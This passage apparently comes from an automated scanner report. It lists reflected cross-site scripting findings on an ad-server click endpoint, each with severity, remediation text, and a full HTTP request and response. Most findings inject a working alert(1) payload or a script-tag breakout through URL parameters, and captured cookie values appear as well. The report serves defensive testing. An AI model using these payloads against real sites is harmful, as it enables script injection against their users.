The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a7c6'%3bce8cc671eea was submitted in the REST URL parameter 4. This input was echoed as 9a7c6';ce8cc671eea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct9a7c6'%3bce8cc671eea/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=! HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:40 GMT
Connection: close
Content-Length: 8985

<html><head><title>KER.1003_oceanclubfall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
<param name="movie" value="HTTP://spe..com/ds/M8MEDKRZNKRZ/KER.1003_oceanclubfall_02_728x90_eng.swf?ver=1&clickTag1=!~!click!~!http://clk..com/go/336191486/direct9a7c6';ce8cc671eea;ai.235678280;ct.1/01&clickTag=!~!click!~!http://clk..com/go/336191486/direct9a7c6';ce8cc671eea;ai.235678280;ct.1/01" />
...[SNIP]...

2.113. http:///MED336191486/direct/013055770899 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7122a"-alert(1)-"e6ea82a136a was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!7122a"-alert(1)-"e6ea82a136a HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:00 GMT
Connection: close
Content-Length: 8958

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
N_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!7122a"-alert(1)-"e6ea82a136a",
clickThruUrl: "http://clk..com/go/336191486/direct;ai.235678306;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

2.114. http:///MED336191486/direct/013055770899 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 545dc"><script>alert(1)</script>9263998cce4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /MED336191486/direct/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!545dc"><script>alert(1)</script>9263998cce4 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:10:58 GMT
Connection: close
Content-Length: 9038

<html><head><title>KER.1003_oceanclubfall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
N_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!545dc"><script>alert(1)</script>9263998cce4\')(new Image).src=\'http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0c
...[SNIP]...

2.115. http:///MED336191486/direct/013055770899 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c89e3'-alert(1)-'c0b3990b0f6 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!c89e3'-alert(1)-'c0b3990b0f6 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:01 GMT
Connection: close
Content-Length: 8951

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
N_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!c89e3'-alert(1)-'c0b3990b0f6');
}
else
{
_strContentKRZ1315417255155 = '<a target="_blank" href="http://clk..com/go/336191486/direct;ai.235678306;ct.1/01/" onclick="if(\'http://adclick.g.doubleclick.net/aclk%253Fsa%25
...[SNIP]...

2.116. http:///MED336191486/direct/013055770899 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51026"-alert(1)-"74f413ef5d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!&51026"-alert(1)-"74f413ef5d0=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:15 GMT
Connection: close
Content-Length: 8973

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!&51026"-alert(1)-"74f413ef5d0=1",
clickThruUrl: "http://clk..com/go/336191486/direct;ai.235678306;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

2.117. http:///MED336191486/direct/013055770899 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c473'-alert(1)-'8c5ef62237c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!&8c473'-alert(1)-'8c5ef62237c=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:17 GMT
Connection: close
Content-Length: 8973

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!&8c473'-alert(1)-'8c5ef62237c=1');
}
else
{
_strContentKRZ1315417255155 = '<a target="_blank" href="http://clk..com/go/336191486/direct;ai.235678306;ct.1/01/" onclick="if(\'http://adclick.g.doubleclick.net/aclk%253Fsa%
...[SNIP]...

2.118. http:///MED336191486/direct/013055770899 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a6a4"><script>alert(1)</script>e74f8e0d785 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /MED336191486/direct/013055770899?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR0cDovL3BhcmFkaXpvLmNvbS-YArgXqQLlM4-yNKa2PsACAuACAOoCJlBhcmFkaXpvX01haW5fQVRGX1RvcExlYWRlYm9hcmRfNzI4eDkw-ALw0R6QA6QDmAPIBqgDAeAEAaAGFg%2526num%253D0%2526sig%253DAOD64_2mXL9RtvmCqAMfcN_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!&6a6a4"><script>alert(1)</script>e74f8e0d785=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:11:14 GMT
Connection: close
Content-Length: 9048

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
_DjTDMWmKDKQ%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=2Mqf-B3Yc0q9g5jKQDdugjh5MYppCb-lpQqw+4cUcrEdqakbb-InS0fEz8v-WSW8Y0vzGeG4sDZ5ksH45JxMpDxNrsoadFqG5dBye886SyM=!&6a6a4"><script>alert(1)</script>e74f8e0d785=1\')(new Image).src=\'http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBxaAk2L-FTr2yFZDajQSK2ey5DK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEUaHR
...[SNIP]...

2.119. http:///MED336191486/direct/013813509777 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://
Path:   /MED336191486/direct/013813509777

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70411'%3be203aa20692 was submitted in the REST URL parameter 4. This input was echoed as 70411';e203aa20692 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MED336191486/direct70411'%3be203aa20692/013813509777?click=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBjGvKj8CFTtTJDonyjQSk2r2vDK7gqN0BAAAAEAEgvMC4CjgAWNaS-qwZYMnW-obIo6AZsgEMcGFyYWRpem8uY29tugEJZ2ZwX2ltYWdlyAEJ2gEiaHR0cDovL3BhcmFkaXpvLmNvbS9wb3J0Zm9saW8uaHRtbJgCuBepAuUzj7I0prY-wAIC4AIA6gImUGFyYWRpem9fTWFpbl9BVEZfVG9wTGVhZGVib2FyZF83Mjh4OTD4AvDRHpADpAOYA8gGqAMB4AQBoAYW%2526num%253D0%2526sig%253DAOD64_17LveDPJhXBgpOd6ReTJPqgrWEBA%2526client%253Dca-pub-8612080020341542%2526adurl%253Dhttp://ad.afy11.net/ad?c=RmzBgiEMXUeeLpUFRZgR9hzLGwXnd2NoP8QlIpckArb7L00VV0+iRMirsMIXLmj6H9pmHJZyta9OJy2jaqmZbuIAHBBHOBLa3ycxHbs-7o0=! HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://paradizo.com/portfolio.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:14:56 GMT
Connection: close
Content-Length: 9070

<html><head><title>KER.1003_palmillafall_02_728x90_eng</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
<param name="movie" value="HTTP://spe..com/ds/M8MEDKRZNKRZ/KER.1003_palmillafall_02_728x90_eng.swf?ver=1&clickTag1=!~!click!~!http://clk..com/go/336191486/direct70411';e203aa20692;ai.235678306;ct.1/01&clickTag=!~!click!~!http://clk..com/go/336191486/direct70411';e203aa20692;ai.235678306;ct.1/01" />
...[SNIP]...

